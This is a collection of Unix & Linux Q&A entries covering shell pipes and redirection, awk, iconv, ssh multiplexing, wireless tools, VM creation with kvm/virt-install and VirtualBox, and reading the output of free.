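# Show the counters that track remapped/pending/uncorrectable sectors
smartctl -A /dev/sda | grep -Ei 'reallocated|pending|uncorrect'
```

A rising Reallocated_Sector_Ct over time is the classic sign that the spare pool is being eaten into.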
dead.letter file warns me about uncorrectable sectors I can't find
1,575,483,815,000
My instructor says to use a pipe to apply a text file, which consists of a list of test cases, to a working program that takes test cases from the input file. Say I have test_cases.txt my_program //my java program after compilation and when I did this java my_program | test_cases.txt it gives [1]+ Stopped java my_program | test_cases.txt Not sure how to use pipe...
First of all, a pipe connects two processes, not files (including text files), such that the output of one goes to the input of the other. The presumption is that the process "generating" the output sends it to STDOUT, which becomes the source for the pipe, and that the process "receiving" the input reads it from STDIN, which becomes the destination of the pipe. You cannot connect a pipe to a text file, or any other file, only to processes. Second, when using a pipe the process on the left side of the pipe is the one that uses STDOUT, and the process on the right side of the pipe uses STDIN. Therefore, your attempted command would be trying to send the output of my_program to the pipe, not reading from it. If you properly presented the instructions you were given, then it can't work anyway. The instructions end with "... a working program that takes test cases from the input file." If the program takes input from a file, then it is not reading from STDIN, and would ignore the data from the pipe anyway. To make it work with a pipe, my_program has to be written to read from STDIN, as in expecting you to type the test cases by hand at a prompt. Then you could rewrite the command line as cat test_cases.txt | java my_program cat is a process that will read the text file and send its contents to STDOUT, then my_program would "read" the data from STDIN using the pipe instead of you typing it manually. Since I don't know how java connects with pipes, this is based on the presumption that it will behave in a standard way, since the instructor asked you to use that method. IMHO it would be better, as in less resource usage, to use redirection rather than a pipe. java my_program < test_cases.txt That is, unless this is one step that will be included in a larger chain of processes later in the course where using a pipe will become necessary.
How to use pipe to apply a text to a program
1,575,483,815,000
I would like to output a series of space-delimited words in a tabular format, filling line by line so that nothing exceeds the terminal's width but the available space is used optimally, like this: +-----------------------------------------------+ |polite babies embarrass rightful | |aspiring scandalous mut disgusted | |bell deeply writer jumbled | |respired craggy | (the box illustrates the terminal's width - it is not part of the output) The commands that spring to mind are fold and column in a pipeline like this: $ fold words -s -w $COLUMNS | column -t This almost works but the output ends up wider than $COLUMNS (the terminal width) because it is first folded within that width and then the whitespace is stretched to line them up. What I need is the effect of both in one. Are there any command-line tools (or shell built-ins) that can do this?
To produce equally spaced columns, you could use BSD rs (also ported to Debian and derivatives (at least) and available as a package there) or BSD column (in the bsdmainutils package on Debian): tr -s '[:space:]' '[ *]' | rs -w "$COLUMNS" tr -s '[:space:]' '[\n*]' | column -xc "$COLUMNS" Example (the vertical line is to show the edge of that 60 column wide screen, it is not part of the output): $ lorem -w 30 | tr -s '[:space:]' '[ *]' | rs -w60 earum aspernatur ipsa sed ┃ quod sit esse quisquam ┃ animi reprehenderit porro et ┃ delectus neque esse quia ┃ pariatur amet iste voluptatem ┃ provident praesentium et sint ┃ quo animi doloribus veritatis ┃ iusto alias ┃ With rs, You can add the -z option to reduce the space between the columns, but that does not optimise the number of columns accordingly. For instance, on the above, it gives (with rs -zw60): earum aspernatur ipsa sed ┃ quod sit esse quisquam ┃ animi reprehenderit porro et ┃ delectus neque esse quia ┃ pariatur amet iste voluptatem ┃ provident praesentium et sint ┃ quo animi doloribus veritatis ┃ iusto alias ┃ Instead of: earum aspernatur ipsa sed quod ┃ sit esse quisquam animi reprehenderit ┃ porro et delectus neque esse ┃ quia pariatur amet iste voluptatem ┃ provident praesentium et sint quo ┃ animi doloribus veritatis iusto alias ┃ It also doesn't work with multi-byte characters or 0-width or double-width characters. By default, it leaves at least 2 spaces between the columns. You can change it to 1 with -g 1.
How can a space-delimited list of words be folded into tabular columns that fit in the terminal's width
1,575,483,815,000
I executed the following line: which lsb_release 2>&1 /dev/null Output: error: no null in /dev When I verified the error using the ls /dev/null command, null was present in /dev. Why is this error occurring? I could not decipher the problem. UPDATE I just tried the above which command on someone else's system, it worked perfectly without generating the error that I got.
First of all, redirections can occur anywhere in the command line, not necessarily at the end or start. For example: echo foo >spamegg bar will save foo bar in the file spamegg. Also, there are two versions of which, one is a shell builtin and the other is an external executable (comes with debianutils in Debian). In your command: which lsb_release 2>&1 /dev/null by 2>&1, you are redirecting the STDERR (FD 2) to where STDOUT (FD 1) is pointed at, not to /dev/null, and this is done first. So the remaining command is: which lsb_release /dev/null As there is no command like /dev/null, hence the error. Note that this behavior depends on whether which is a shell builtin or an external executable; bash, ksh and dash do not have a builtin and use the external which, which simply ignores the error and does not show any error message. On the other hand, zsh uses a builtin which and shows: /dev/null not found So presumably, that specific error is shown by the builtin which of the shell you are using. Also, it seems you wanted to just redirect the STDERR to /dev/null if lsb_release does not exist in the PATH i.e. which shows an error. If so, just redirect the STDERR to /dev/null: which lsb_release 2> /dev/null
no null in /dev error
1,575,483,815,000
Lately I hit upon the command that prints the TOC of a pdf file. mutool show file.pdf outline I'd like to use a command for the epub format with similar simplicity of usage and a similarly nice result as the above for the pdf format. Is there something like that?
.epub files are .zip files containing XHTML and CSS and some other files (including images, various metadata files, and maybe an XML file called toc.ncx containing the table of contents). The following script uses unzip -p to extract toc.ncx to stdout, pipe it through the xml2 command, then sed to extract just the text of each chapter heading. It takes one or more filename arguments on the command line. #! /bin/sh # This script needs InfoZIP's unzip program # and the xml2 tool from http://ofb.net/~egnor/xml2/ # and sed, of course. for f in "$@" ; do echo "$f:" unzip -p "$f" toc.ncx | xml2 | sed -n -e 's:^/ncx/navMap/navPoint/navLabel/text=: :p' echo done It outputs the epub's filename followed by a :, then indents each chapter title by two spaces on the following lines. For example: book.epub: Chapter One Chapter Two Chapter Three Chapter Four Chapter Five book2.epub: Chapter One Chapter Two Chapter Three Chapter Four Chapter Five If an epub file doesn't contain a toc.ncx, you'll see output like this for that particular book: book3.epub: caution: filename not matched: toc.ncx error: Extra content at the end of the document The first error line is from unzip, the second from xml2. xml2 will also warn about other errors it finds - e.g. an improperly formatted toc.ncx file. Note that the error messages are on stderr, while the book's filename is still on stdout. xml2 is available pre-packaged for Debian, Ubuntu and other debian-derivatives, and probably most other Linux distros too. For simple tasks like this (i.e. where you just want to convert XML into a line-oriented format for use with sed, awk, cut, grep, etc), xml2 is simpler and easier to use than xmlstarlet. BTW, if you want to print the epub's title as well, change the sed script to: sed -n -e 's:^/ncx/navMap/navPoint/navLabel/text=: :p s!^/ncx/docTitle/text=! Title: !p' or replace it with an awk script: awk -F= '/(navLabel|docTitle)\/text/ {print $2}'
Extract TOC of epub file
1,575,483,815,000
I have used the info from another question on Stack Exchange to allow me to rename files using the info in a csv file. This line allows me to rename all files from the names in column 1, to the names in column 2. while IFS=, read -r -a arr; do mv "${arr[@]}"; done <$spreadsheet However, it attempts to compare the info in the top row. I would like to be able to include some code which allows me to skip rows. It would also be nice to gain a better understanding of how the above line of code works. I would have thought it would include some info about columns (ie. A and B)
Try this: tail -n +2 $spreadsheet | while IFS=, read -r -a arr; do mv "${arr[@]}"; done The tail command prints only the last lines of a file. With the "-n +2", it prints all the last lines of the file starting at the second. More on the while loop. The while loop runs the mv command as long as there are new lines available. It does that by using the condition of the while loop: IFS=, read -r -a arr What the above does is read one line into an array named arr, where the field separator (IFS) is a comma. The -r option likely is not needed. Then, when running the mv command, "${arr[@]}" is expanded to the list of fields, each field as a separate quoted word. In your case, there are only two fields per line, so it expands to just the two fields. The "${arr[@]}" is a special convention used by bash for Arrays, as explained in the manual: Any element of an array may be referenced using ${name[subscript]}. The braces are required to avoid conflicts with pathname expansion. If subscript is @ or *, the word expands to all members of name. These subscripts differ only when the word appears within double quotes. If the word is double-quoted, ${name[*]} expands to a single word with the value of each array member separated by the first character of the IFS special variable, and ${name[@]} expands each element of name to a separate word. When there are no array members, ${name[@]} expands to nothing. If the double-quoted expansion occurs within a word, the expansion of the first parameter is joined with the beginning part of the original word, and the expansion of the last parameter is joined with the last part of the original word. This is analogous to the expansion of the special parameters * and @ (see Special Parameters above). ${#name[subscript]} expands to the length of ${name[subscript]}. If subscript is * or @, the expansion is the number of elements in the array. Referencing an array variable without a subscript is equivalent to referencing element zero.
Skip first line (or more) in CSV file which is used to rename files
1,575,483,815,000
Is it possible, using grep, find, etc, to sort a list of directories by the last modified date of the same-named file (e.g., file.php) within? For example: domain1/file.php (last modified 20-Jan-2014 00:00) domain2/file.php (last modified 22-Jan-2014 00:00) domain3/file.php (last modified 24-Jan-2014 00:00) domain4/file.php (last modified 23-Jan-2014 00:00) Each directory has the same file name (e.g., file.php). The result should be: domain3/ (last modified 24-Jan-2014 00:00) domain4/ (last modified 23-Jan-2014 00:00) domain2/ (last modified 22-Jan-2014 00:00) domain1/ (last modified 20-Jan-2014 00:00)
As Vivian suggested, the -t option of ls tells it to sort files by modification time (most recent first, by default; reversed if you add -r). This is most commonly used (at least in my experience) to sort the files in a directory, but it can also be applied to a list of files on the command line. And wildcards (“globs”) produce a list of files on the command line. So, if you say ls -t */file.php it will list domain3/file.php domain4/file.php domain2/file.php domain1/file.php But, if you add the -1 (dash one) option, or pipe this into anything, it will list them one per line. So the command you want is ls -t */file.php | sed 's|/file.php||' This is an ordinary s/old_string/replacement_string/ substitution in sed, but using | as the delimiter, because the old_string contains a /, and with an empty replacement_string. (I.e., it deletes the filename and the / before it — /file.php — from the ls output.) Of course, if you want the trailing / on the directory names, just do sed 's|file.php||' or sed 's/file.php//'. If you want, add the -l (lower-case L) option to ls to get the long listing, including modification date/time. And then you may want to enhance the sed command to strip out irrelevant information (like the mode, owner, and size of the file) and, if you want, move the date/time after the directory name. This will look into the directories that are in the current directory, and only them. (This seems to be what the question is asking for.) Doing a one-level scan of some other directory is a trivial variation: ls -t /path/to/tld/*/file.php | sed 's|/file.php||' To (recursively) search the entire directory tree under your current directory (or some other top-level directory) is a little trickier. Type the command shopt -s globstar and then replace the asterisk (*) in one of the above commands with two asterisks (**), e.g., ls -t **/file.php | sed 's|/file.php||'
Sorting directories by last modified date/time of the same-named contained file
1,575,483,815,000
I am trying to get a list of wireless networks nearby while the adapter is acting as an access point but iwlist returns the following error: $ sudo iwlist wlan0 scan wlan0 Interface doesn't support scanning : Operation not supported Is there another way of getting this list, perhaps with another utility? My Tomato powered WRT54 seems to be able to achieve this (listing nearby APs while the device itself is set up as an AP), so I'm curious how I could replicate that behaviour. Thanks.
iwlist is seriously deprecated. Remove it from your system and never use it again. Do the same with iwconfig, iwspy. Those tools are ancient and were designed in an era where 802.11n didn't exist. Kernel developers maintain an ugly compatibility layer to still support wireless-tools, and this compatibility layer often lies. Now install iw if not already done. The iw command you are looking for is iw dev wlan0 scan ap-force. This is a fairly recent addition. Not all drivers support this, but most should do.
Getting a list of WiFi networks nearby when the adapter is in AP mode
1,575,483,815,000
Are there any terminal-based (ie. non-GUI) virtual-computer programs out there? I've been using programs like VirtualBox and QEMU, but they're obviously GUI-based... I was hoping for a virtual PC program where I can do everything - create a new virtual machine, create it's disk, install OS (assuming a text-based installer is available) and start the VM on a terminal (thus replacing the host's shell with the VM's boot-message, log-in prompt and shell) - from a virtual-terminal/xterm-window/ssh/screen-session, instead of in a window under X. The reason I ask, is that I often use ssh at work to connect to my home-computer, and the network is too slow for X or VNC. Still I'd like to tinker with VMs...
In qemu/kvm, you only get a GUI if you attach a video card to your VM and if you don't expose it as SPICE/VNC. For instance, you can do (zsh syntax, with grub2): grub-mkimage -O i386-pc -c =(print -l serial 'terminal_input serial' \ 'terminal_output serial' ) -o grub.img configfile biosdisk part_msdos part_gpt ext2 \ linux test serial halt minicmd cat And start your VM with: kvm -kernel grub.img -hda yourdisk.img -nographic From the grub prompt, load the kernel from the disk passing console=ttyS0... option or equivalent on the system you're booting to have the console on serial. Remember to add a getty on the serial line as well. Assuming you're running Linux in the VM, you can then update its grub config to display on serial and boot a kernel with serial console, and then you can boot your image disk directly without that grub.img. To access the qemu "monitor", type Ctrl-Ac (where you can add/remove devices...). You can have the serial port as a unix domain or TCP socket, instead of stdio if you like as well. Same for the qemu "monitor" interface. Now, provided you have the sgabios.bin firmware, and that your VM doesn't use graphics (just VGA BIOS text output), you can also just use the -curses option: kvm -hda yourdisk -curses The VGA console is then shown in your terminal. If you need to access the qemu monitor, press Alt-2.
Terminal-based (non GUI) virtual-computer program?
1,575,483,815,000
I am trying to have a confirmation message every time I type the exit command at the command prompt. To do this, I have tried to use trap in the .bashrc file, but it seems like trap is not a solution as it runs the original command anyway. Is there a way I can have this? Here is my bashrc script code which could not get the job done: function _exit() # Function to run upon exit of shell. { read -p "${RED}Are you sure? " REPLY if [[ $REPLY =~ ^[Yy]$ ]]; then echo -e "${RED}Bye${NC}" exit 0 else #I do not know what to do here to not exit return fi } trap _exit EXIT
If the shell is zsh or bash (though not in sh mode), make exit a function. Functions have precedence over shell builtins (even special ones like exit) in zsh or bash (though not in POSIX shells). So just rename your function to exit and use command exit within the function instead. Otherwise you would get endless recursion, of course.
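Applied to the .bashrc function from the question, a minimal sketch might look like this (the interactive-shell guard is an extra precaution added here so that non-interactive scripts are unaffected; the colour variables from the original are omitted):

```shell
# Shadow the exit builtin with a function (bash/zsh give functions
# precedence over builtins, so this works there but not in POSIX sh).
if [[ $- == *i* ]]; then
    exit() {
        read -p "Are you sure? " REPLY
        if [[ $REPLY =~ ^[Yy]$ ]]; then
            command exit "$@"   # run the real builtin
        fi
        # anything else: fall through and return to the prompt
    }
fi
```

Typing exit at the prompt then asks for confirmation; answering anything but y/Y drops you back to the shell.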
Confirm before exit the command-prompt
1,575,483,815,000
I noticed this problem when I became confused with pipes: one command sends its output to STDOUT, which becomes the STDIN of the other command, if that command can read from STDIN. How do I know if a Linux command can read from STDIN? Is there a feature to distinguish commands that can read from STDIN from those that cannot?
(In response to the upvotes on my comment) There isn't a concrete way of determining if an application reads from STDIN or something else. In general, you'll have to try piping something to it or reading the program's man page.
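A quick empirical probe is to pipe some known input in and see whether the output changes; tr and echo below are just illustrative stand-ins for whatever command you are testing:

```shell
# tr reads STDIN, so the piped text is transformed:
printf 'hello\n' | tr 'a-z' 'A-Z'    # prints HELLO
# echo ignores STDIN entirely; the piped text is discarded:
printf 'hello\n' | echo hi           # prints hi
```

If the command's output is identical with and without piped input, it almost certainly isn't reading STDIN.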
How to know if a Linux command can read from STDIN?
1,575,483,815,000
Is there a simple way for me to add a shell command to a list of jobs to have run on the system when I'm not logged in? For example: I SSH into my system, decide that I want to read an ebook later, but it's in the wrong format. I'll use Calibre to convert it, but this will take up the CPU for many minutes. I'm in no rush though, so I would like to tell my system to start the Calibre convert operation (just running a shell command) as soon as I log out of my SSH session. Then later when I SSH in again, my converted book will be waiting for me.
A simple, but possibly inconvenient method is to start the command with nohup to detach it from the terminal, just before logging out. nohup mycommand & logout Any output from the command is sent to the file nohup.out in the current directory. It is usually more convenient to run the command inside screen or tmux. Both programs provide a terminal within a terminal, and you can detach your session from the current terminal and reattach to it later. screen # inside the screen session sleep 60; mycommand # press Ctrl+A D to detach from the session # now back in the original shell logout Then later: screen -rd # inside the screen session, you can see how your command is doing … exit Another possibility is to schedule the job for later. The at command lets you schedule a job at a specific time (it's the one-off counterpart of cron for regularly scheduled tasks). If the command produces output, it'll be mailed to you (assuming you have local mail running). echo 'mycommand' | at 23:05
GNU: Delayed jobs Queue
1,575,483,815,000
Is there a command that relaunches an application once it finishes, from the command line? Letting you do something like: > relaunch python myapp.py If not, then what's my best option? I know I could cron it, but I'd be more interested in something I could just execute from the terminal and that restarts at once. I'm on Debian if that matters.
You can try with a simple infinite loop: while true; do python myapp.py done Edit: the above is just a simple generic example; most probably modifications are needed to take exit codes etc. into account. For example, to restart only while the program keeps exiting with an error: until python myapp.py; do echo "non-zero exit, restarting" done
Relaunch application once finished
1,575,483,815,000
I'm looking for some tool that can convert text, ideally from UTF-8 (but ISO-8859-2 and WINDOWS-1250 would be fine) into ASCII/ISO-8859-1? I have seen some online transliteration tools but I need something for the command line (and iconv is refusing to convert the file).
By default, iconv refuses to convert the file if it contains characters that do not exist in the target character set. Use //TRANSLIT to “downgrade” such characters. iconv -f utf-8 -t iso8859-1//TRANSLIT
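As a quick sanity check, try it on a character that has no ASCII equivalent, such as the euro sign (the exact transliteration produced depends on your iconv implementation and locale; glibc renders €, for instance, as EUR, other setups may fall back to ?):

```shell
# Without //TRANSLIT, iconv would abort on the euro sign; with it,
# the character is approximated instead.
printf 'price: \342\202\254 5\n' | iconv -f utf-8 -t ascii//TRANSLIT
```

The same //TRANSLIT suffix works on whole files: iconv -f utf-8 -t iso8859-1//TRANSLIT input.txt > output.txt.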
Converting text into ASCII/ISO-8859-1
1,575,483,815,000
I have a runaway ruby process - I know exactly how I trigger it. Point is, it got me thinking about runaway processes (CPU usage or memory usage). How would one monitor runaway processes with cron? grep / top / ulimit? Can one notify the user via the command line if something like this happens? What alternatives are there to Monit?
Instead of writing a script yourself you could use the verynice utility. Its main focus is on dynamic process renicing but it also has the option to kill runaway processes and is easily configured.
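If you'd rather roll your own cron job than install anything, a minimal sketch could look like the following (the 90% threshold and the choice to merely print rather than kill are assumptions to tune; the ps options are the GNU/Linux ones):

```shell
#!/bin/sh
# Report processes above a CPU threshold; swap the print for a kill
# or a mail command once you trust what it flags.
THRESHOLD=90
ps -eo pid,pcpu,comm --sort=-pcpu |
    awk -v t="$THRESHOLD" 'NR > 1 && $2 > t { print "runaway candidate:", $1, $2 "%", $3 }'
```

Run from cron every few minutes, any output gets mailed to the crontab's owner by default, which doubles as the notification.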
cronjob to watch for runaway processes and kill them
1,575,483,815,000
I'm sometimes working on the command line (or in the Ranger file manager), and it's annoying to have to move to a graphical interface to double-click on a AppImage. It looks like Ranger tries xdg-open; I tried that on the command line, myself, and that fails. My permissions are correct, so how can I actually run an AppImage from the command line?
Making it executable chmod +x file and running it with ./file worked for me.
How to run AppImage on the command line
1,575,483,815,000
I'm using the following line in my scripts: ssh -f -N -M -S <control socket> <host> This means the initial connection just stays in the background and I can use it for subsequent calls to ssh: ssh -S <control socket> <host> <command> However, if I have multiple scripts with commands which are supposed to use the same control socket and put the "background" call to ssh into all of them, I will get the following message at some point: ControlSocket <control socket> already exists, disabling multiplexing This has no influence over the rest of the script because obviously the socket exists and can be used by the subsequent ssh commands. However, even though the "background" session couldn't open the socket, it doesn't quit and stays active - just without multiplexing. Using [ -S or ssh -O check to check the existence of the socket would still leave the possibility of race conditions. How can I do "open control socket if it doesn't exist yet, and exit if it does"?
I think you are looking for ControlMaster auto, which can be either specified in configuration file or directly on command-line with -o ControlMaster=auto. This allows you to unify the commands opening the connection and using it (also very helpful with ControlPersist).
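For the configuration-file route, an ~/.ssh/config entry along these lines gives every script the open-if-absent behaviour automatically (the host name and socket path here are placeholders):

```
Host myhost
    ControlMaster auto
    ControlPath ~/.ssh/cm-%r@%h:%p
    ControlPersist 10m
```

With ControlPersist, the first ssh myhost sets up the master socket and keeps it alive for 10 minutes after the last session; subsequent ssh myhost calls multiplex over it without any race on socket creation.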
How to abort if ssh control socket already exists?
1,575,483,815,000
I've seen lots of places where people have suggested storing command line arguments: ~/.config/google-chrome-flags.conf ~/.config/chromium-flags.conf /etc/default My version of chromium doesn't seem to be using these, and none of these locations are mentioned in man chromium-browser. Where would I best store a command line flag that I want to be supplied to chromium-browser?
I found joy in /etc/chromium-browser/default, which is where the CHROMIUM_FLAGS variable is set: CHROMIUM_FLAGS="--incognito --password-store=gnome"
Where can I configure Chromium's default command line arguments?
1,575,483,815,000
I'd like to separate records by the first word (e.g. DEBUG or INFO) and keep the RS, but when I execute the program, awk removes the RS. How do I keep it? log.txt is DEBUG:[2018-04-09 13:00:01] ========================= START LOG : : END LOG =========================== DEBUG:[2018-04-09 13:00:02] INFO:[2018-04-09 13:00:03] DEBUG:[2018-04-09 13:00:04] ========================= START LOG : : END LOG =========================== my attempt is $gawk 'BEGIN{RS="(DEBUG|INFO)"; FS="\n"}{print RS$0}' log.txt but it shows (DEBUG|INFO):[2018-04-09 13:00:01] ========================= START LOG : : END LOG =========================== (DEBUG|INFO):[2018-04-09 13:00:02] (DEBUG|INFO):[2018-04-09 13:00:03] (DEBUG|INFO):[2018-04-09 13:00:04] ========================= START LOG : : END LOG ===========================
You can use RT gawk 'BEGIN{RS="(DEBUG|INFO)"; FS="\n"}{printf "%s%s", $0, RT}' log.txt
Is it possible to keep record separator in awk?
1,515,164,174,000
I have a python program that I run via the command line (Mac OS X) as: python -W ignore Experiment.py --iterations 10 The file Experiment.py should be run multiple times using different --iterations values. I do that manually one after another, so when one run is finished, I run the second one with a different --iterations, and so on. However, I cannot always sit near my laptop to run all of them, so I am wondering if there is a way, using a shell script, where I can list all runs together and then the shell script executes them one after another (not in parallel, just sequentially, as I would have done myself)? Something like: python -W ignore Experiment.py --iterations 10 python -W ignore Experiment.py --iterations 100 python -W ignore Experiment.py --iterations 1000 python -W ignore Experiment.py --iterations 10000 python -W ignore Experiment.py --iterations 100000 Edit: What if I have multiple arguments --X --Y --Z?
You can use a for loop: for iteration in 10 100 1000 10000 100000; do python -W ignore Experiment.py --iterations "${iteration}" done If you have multiple parameters, and you want all the various permutations of all parameters, as @Fox noted in a comment below, you can use nested loops. Suppose, for example, you had a --name parameter whose values could be n1, n2, and n3, then you could do: for iteration in 10 100 1000 10000 100000; do for name in n1 n2 n3; do python -W ignore Experiment.py --iterations "${iteration}" --name "${name}" done done You could put that in a file, for example runExperiment.sh and include this as the first line: #!/bin/bash. You could then run the script using either: bash runExperiment.sh Or, you could make the script executable, then run it: chmod +x runExperiment.sh ./runExperiment.sh If you're interested in some results before others, that'll guide how you structure the loops. In my example above, the script will run: ... --iterations 10 --name n1 ... --iterations 10 --name n2 ... --iterations 10 --name n3 ... --iterations 100 --name n1 So it runs all experiments for iteration 10 before moving on to the next iteration. If instead you wanted all experiments for name n1 before moving on to the next, you could make the name loop the "outer" loop. for name in ...; do for iteration in ...; do
Running a program with several parameters using shell script
1,515,164,174,000
How can I create a virtual machine from the CLI? Creating a Virtual Machine First, download an ISO cd image of some OS you want to run. For Ubuntu, you can find these at: http://www.ubuntu.com/getubuntu/download Double click on the name of the host. The Status column should read Active Right click on the name of the host, and select New This will start a wizard to guide you through the rest of your VM creation Enter your virtual machine details Name: foo Choose Local install media (ISO image or CDROM), or you can use another method if you know what you're doing Forward Locate your install media Use ISO image Browse to find the ISO you downloaded earlier Optional: Select the matching OS Type Optional: Select the matching Version Forward Primarily just for my own edification.
Just use: virt-install \ --name vm_name \ --ram=2048 \ --vcpus=2 \ --disk pool=guest_images,size=30,bus=virtio,format=qcow2 \ --cdrom /var/iso/debian.iso \ --network bridge=kvmbr0,model=virtio \ --graphics vnc,listen=0.0.0.0,password=Qwerty1234 \ --boot cdrom,hd,menu=on Where /var/iso/debian.iso - path to the ISO image guest_images - the disk pool; you need to create it before creating the VM
create a virtual machine from the CLI? (KVM)
1,515,164,174,000
I connect with the following command: sudo wpa_supplicant -B -D nl80211 -i wlan_card -c /etc/wpa_supplicant/connection.conf It connects fine, and keeps a persistent connection. If the AP goes down, the connection tears down; if the AP gets back up, the connection comes back. If I power down the wifi interface: sudo ip link set wlan_card down It goes down. When I bring it up with: sudo ip link set wlan_card up The connection, that was launched in the very beginning with wpa_supplicant, reconnects again. Such a stable, persistent connection is very good, but it causes a problem if I want to connect to a different AP. When I try to use wpa_cli with any command, it just gives me the following error: Failed to connect to non-global ctrl_ifname: (nil) error: No such file or directory When I try to disconnect with: sudo iw dev wlan_card disconnect It disconnects, but reconnects right away, so, currently, I have to resort to: ps -AlF|grep -i wpa sudo kill -KILL wpa_pid I wish to know the correct method to stop the connection, or is killing the only way?
Before connecting to a different AP you can stop the running instance of the wpa_supplicant service: sudo killall wpa_supplicant Configure your /etc/wpa_supplicant/connection.conf then connect through wpa_supplicant again.
How to disconnect wifi link, that was connected with wpa_supplicant
1,515,164,174,000
I am setting up an Arch/Manjaro-based machine that only occasionally will be connected to network. I.e. most of the time its Ethernet card is disconnected. I run into this curious problem - when I try to use networking commands the interface is down (I sit next to it with my laptop that has a Wi-Fi Internet connection). So I am not sure if it is working properly. How do I set up the network without an Ethernet connection present so that when I finally plug in a cable I can be sure that the address will be 192.168.1.1? I found the answer: use SkipNoCarrier=yes in the netctl profile. It is in Manjaro StaticIP wiki and in Arch netctl page.
Like this, for example: for a static IP configuration, copy the /etc/netctl/examples/ethernet-static example profile to /etc/netctl and modify Interface, Address, Gateway and DNS as needed. For example, /etc/netctl/my_static_profile:

    Interface=enp1s0
    Connection=ethernet
    IP=static
    Address=('10.1.10.2/24')
    Gateway=('10.1.10.1')
    DNS=('10.1.10.1')

See the official Arch Wiki for details. This of course only works if you don't use NetworkManager or something similar to control your network.
How do I set a static IP address for a disconnected interface?
1,515,164,174,000
I have my VMs on a dedicated computer; over SSH I use vboxheadless to start them, and then I use remote desktop to use them.

While a VM is running with an attached GUI, it is trivial to insert the "Guest Additions" image into the guest's optical drive and install it: it's at Devices > Insert Guest Additions CD Image. However, since I'm using the guest OS via remote desktop, I obviously don't have the menus. I'd like to know how to perform this function from the command line. I imagine it involves using vboxmanage to insert and remove that CD image from the virtual guest machine's drive.

Also, is there a way to insert any other CD images and/or floppy images into the virtual drives of a guest system, and remove them, while the guest OS is running?
The way I do this is:

Get the Guest Additions UUID:

    [fredmj@Lagrange ~]$ vboxmanage list dvds
    [...]
    UUID:           3cc8e4fb-e56e-blabla...
    State:          created
    Type:           readonly
    Location:       /usr/share/virtualbox/VBoxGuestAdditions.iso
    Storage format: RAW
    Capacity:       55 MBytes
    Encryption:     disabled

Then use vboxmanage storageattach with the correct UUID: grab the UUID and put it in the vboxmanage command:

    [fredmj@Lagrange ~]$ vboxmanage storageattach CENTOS7.GUESTADD --storagectl SATA --port 1 --type dvddrive --medium 3cc8e4fb-e56e-blabla...

Reading the User Manual, I thought it was possible to use something like --medium additions, but I didn't figure out how.
How to "insert" guest additions image in VirtualBox from command line, while VM is running?
1,515,164,174,000
I'm not sure what's going on, but I've been trying to understand what is happening with the input and output. Here is my program:

    #include <stdio.h>
    #include <stdlib.h>

    int main(){
        char pass[8];
        fgets(pass, 8, stdin);
        if (pass[1] == 'h'){
            printf("enter shell\n");
            system("/bin/bash");
            printf("leave shell\n");
        }
        return 0;
    }

And here are some terminal commands. When I run it normally and input 'hh', the shell stays open:

    idkanything ~ $ ./a.out
    hh
    enter shell
    bash-3.2$

Now I try to echo then pipe, but the shell closes immediately:

    idkanything ~ $ echo "hh" | ./a.out
    enter shell
    leave shell

Here is a case where it works:

    idkanything ~ $ cat <(python -c 'print "hh"') - | ./a.out
    enter shell
    this work
    /bin/bash: line 1: this: command not found
    leave shell

But when I leave out the '-' for stdin, it does not work, in that the shell closes immediately:

    idkanything ~ $ cat <(python -c 'print "hh"') | ./a.out
    enter shell
    leave shell

When I have cat at the end here, it also works:

    idkanything ~ $ (python -c 'print "hh"'; cat) | ./a.out
    enter shell
    this works
    /bin/bash: line 1: this: command not found
    leave shell

Can someone please explain what's going on? What is it, specifically, about the commands that work that makes the shell stay open? Why does the shell stay open only for these commands and not for the others, like echoing "hh" and then piping that in? I believe it may have something to do with stdout.
For the cases where it "works", you are leaving a process running cat which is reading its standard input, which has not been closed. Since that is not (yet) closed, cat continues to run, leaving its standard output open, which is used by the shell (also not closed).
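This can be reproduced without the C program at all, using shell stand-ins (a sketch: the shell's `read` builtin plays the role of fgets(), and an inner `cat` plays the role of the spawned /bin/bash reading its inherited stdin):

```shell
# Stand-ins: `read` consumes the first line (like fgets in the program),
# then `cat` reads whatever is left on stdin (like the spawned shell).

# Only one line of input: after read eats it, cat hits EOF and exits
# immediately, so 0 lines pass through.
printf 'hh\n' | { IFS= read -r line; cat; } | wc -l

# Extra input still pending on stdin: cat (the "shell") receives it
# and stays alive until that input is exhausted.
printf 'hh\nrest\n' | { IFS= read -r line; cat; }
```

The second pipeline prints `rest`: the inner reader only survives as long as its standard input has not been closed, which is exactly the behavior described above.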
cat into stdin then pipe into program keeps forked shell open, why?
1,515,164,174,000
I have an alias in .bashrc like this:

    alias ylog="yarn logs -applicationId"

This works well when I do ylog application_123. Sometimes my job names come in the form job_123 instead of application_123, and in order to use ylog I need to manually replace the text "job" with "application" on my command line. Is it possible to improve the alias so that the following happens:

    ylog job_123            resolves to ylog application_123
    ylog application_123    resolves to ylog application_123
Bash does not allow parameters in aliases, so you need to define and use a function, e.g.:

    ylog() {
        yarn logs -applicationId "${1/#job_/application_}"
    }
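You can check the expansion without actually invoking yarn; in this sketch, echo stands in for the real command so the result can be inspected anywhere:

```shell
# echo stands in for yarn here so the expansion can be inspected.
# ${1/#job_/application_} replaces a leading "job_" with "application_"
# and leaves any other value untouched.
ylog() {
    echo yarn logs -applicationId "${1/#job_/application_}"
}

ylog job_123            # -> yarn logs -applicationId application_123
ylog application_123    # -> yarn logs -applicationId application_123
```

The `/#` anchor matters: it restricts the substitution to the start of the string, so an application ID that happens to contain "job_" elsewhere would not be mangled.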
Improve existing alias to dynamically replace command line text
1,515,164,174,000
I noticed there is a difference between the outputs of the free command.

On Debian:

    $ free -h
                 total       used       free     shared    buffers     cached
    Mem:          4.0G       3.4G       629M         0B        96K       1.3G
    -/+ buffers/cache:       2.1G       2.0G
    Swap:         4.0G       1.1G       2.9G

On Gentoo:

    $ free -h
                 total       used       free     shared  buff/cache  available
    Mem:           15G       3.7G       9.6G       485M        2.2G        11G
    Swap:         8.8G       2.6G       6.2G

Red Hat (at least 7.x) seems to have the same output as Gentoo. Why is that? Is it possible to display Debian-style output on Gentoo / Red Hat systems as well? Are both distros using different GNU coreutils?
free is provided by procps-ng. Debian 8 has version 3.3.9, which uses the old style with a separate line for buffers/cache, while Gentoo and presumably RHEL 7.x have version 3.3.10 or later, which uses the new style. You can see the reasoning behind the change in the corresponding commit message.

If you really want the old-style output you can run an older version of procps, but you'll find that distributions will migrate to the newer style by default. The newer style also gives the amount of available memory, which is a really useful piece of information (see "How can I get the amount of available memory portably across distributions?" for details).

